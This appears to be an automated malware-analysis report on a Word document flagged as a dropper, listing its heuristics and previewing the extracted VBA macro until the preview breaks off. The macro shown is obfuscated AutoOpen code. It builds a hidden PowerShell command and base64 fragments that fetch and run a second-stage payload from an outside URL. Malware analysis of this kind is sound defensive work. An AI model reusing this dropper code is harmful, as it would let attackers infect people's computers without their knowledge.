Risk Score: 242 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that uses the Shell() function to execute a command. This command appears to decode and run a second-stage payload, as indicated by the obfuscated string construction and the ClamAV detection name 'Doc.Dropper.Agent-6453823-0'. The macro's intent is to download and execute a further payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6453823-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6453823-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6171 bytes |

SHA-256 of macros.bas: b4a65af8f513432aa7c620648e7101edbdcc8b17110b9e3006226529469282c7
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "uncategorized"
Sub AutoOpen()
Dim EL_RI As String
EL_OJ = Array("w", "s", "u", "p", "x", "b", "h", "n", "e", "i", " ", "a", "c", "o", "y", "d", "l", "t", "-", "r")
Dim CS_TE As String
CS_TE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsA"
EL_RI = EL_RI + EL_OJ(3)
EL_RI = EL_RI + EL_OJ(13)
Dim BT_NC As String
BT_NC = "cgBlAHQAdQByAG4AIABbAF"
EL_RI = EL_RI + EL_OJ(0)
EL_RI = EL_RI + EL_OJ(8)
Dim BN_NG As String
BN_NG = "MAeQBzAHQAZQBtAC4"
EL_RI = EL_RI + EL_OJ(19)
EL_RI = EL_RI + EL_OJ(1)
Dim JR_RB As String
JR_RB = "AVABlAHgAdAAuAE"
EL_RI = EL_RI + EL_OJ(6)
EL_RI = EL_RI + EL_OJ(8)
Dim CT_NH As String
CT_NH = "UAbgBjAG8AZABpAG4AZwBdAD"
CL_SG = CL_SG & CS_TE & BT_NC & BN_NG & JR_RB & CT_NH
EL_RI = EL_RI + EL_OJ(16)
EL_RI = EL_RI + EL_OJ(16)
Dim AN_TH As String
AN_TH = "oAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
EL_RI = EL_RI + EL_OJ(10)
EL_RI = EL_RI + EL_OJ(18)
Dim GQ_ND As String
GQ_ND = "aQBuAGcAKABbAFMAeQBzAHQAZQBtA"
EL_RI = EL_RI + EL_OJ(0)
EL_RI = EL_RI + EL_OJ(9)
Dim FN_OI As String
FN_OI = "C4AQwBvAG4AdgBlAHIAdABdADoAOg"
EL_RI = EL_RI + EL_OJ(7)
EL_RI = EL_RI + EL_OJ(15)
Dim IT_NC As String
IT_NC = "BGAHIAbwBtAEIAYQBzA"
EL_RI = EL_RI + EL_OJ(13)
EL_RI = EL_RI + EL_OJ(0)
Dim DK_SH As String
DK_SH = "GUANgA0AFMAdAByAGkAbgB"
CL_SG = CL_SG & AN_TH & GQ_ND & FN_OI & IT_NC & DK_SH
EL_RI = EL_RI + EL_OJ(1)
EL_RI = EL_RI + EL_OJ(17)
Dim JO_MC As String
JO_MC = "nACgAJAB4ACkAKQ"
EL_RI = EL_RI + EL_OJ(14)
EL_RI = EL_RI + EL_OJ(16)
Dim GM_LA As String
GM_LA = "B9ADsAaQBlAHgAIAAkACgA"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(10)
Dim DR_LJ As String
DR_LJ = "YQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0"
EL_RI = EL_RI + EL_OJ(6)
EL_RI = EL_RI + EL_OJ(9)
Dim AO_NF As String
AO_NF = "AdwBlAGIAc"
EL_RI = EL_RI + EL_OJ(15)
EL_RI = EL_RI + EL_OJ(15)
Dim DP_OE As String
DP_OE = "gBlAHEAdQB"
CL_SG = CL_SG & JO_MC & GM_LA & DR_LJ & AO_NF & DP_OE
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(7)
Dim DQ_OD As String
DQ_OD = "lAHMAdAAgACcAaAB0AH"
EL_RI = EL_RI + EL_OJ(10)
EL_RI = EL_RI + EL_OJ(18)
Dim GK_KF As String
GK_KF = "QAcABzADoALwAvAHUAcw"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(4)
Dim DN_SH As String
DN_SH = "BwAHIAZAA1ADEANQAwA"
EL_RI = EL_RI + EL_OJ(8)
EL_RI = EL_RI + EL_OJ(12)
Dim IL_SA As String
IL_SA = "GMAZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlA"
EL_RI = EL_RI + EL_OJ(2)
EL_RI = EL_RI + EL_OJ(17)
Dim CN_KE As String
CN_KE = "C4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8Ad"
CL_SG = CL_SG & DQ_OD & GK_KF & DN_SH & IL_SA & CN_KE
EL_RI = EL_RI + EL_OJ(9)
EL_RI = EL_RI + EL_OJ(13)
Dim EP_ND As String
EP_ND = "wBhAHIA"
EL_RI = EL_RI + EL_OJ(7)
EL_RI = EL_RI + EL_OJ(3)
Dim AM_KB As String
AM_KB = "ZQBoAG8Ad"
EL_RI = EL_RI + EL_OJ(13)
EL_RI = EL_RI + EL_OJ(16)
Dim HQ_QC As String
HQ_QC = "QBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhA"
EL_RI = EL_RI + EL_OJ(9)
EL_RI = EL_RI + EL_OJ(12)
Dim IM_PF As String
IM_PF = "HIAdABpAHQAaQBvAG4ASwBl"
EL_RI = EL_RI + EL_OJ(14)
EL_RI = EL_RI + EL_OJ(10)
Dim FT_NJ As String
FT_NJ = "AHkAJQAyADAAZQBxACUAMgAwA"
CL_SG = CL_SG & EP_ND & AM_KB & HQ_QC & IM_PF & FT_NJ
EL_RI = EL_RI + EL_OJ(5)
EL_RI = EL_RI + EL_OJ(14)
Dim FL_MG As String
FL_MG = "CUAMgA3AHMAdABhAGcAZQAlADIANwAmACQAUwBlAG"
EL_RI = EL_RI + EL_OJ(3)
EL_RI = EL_RI + EL_OJ(11)
Dim DL_NE As String
DL_NE =
```

... (truncated)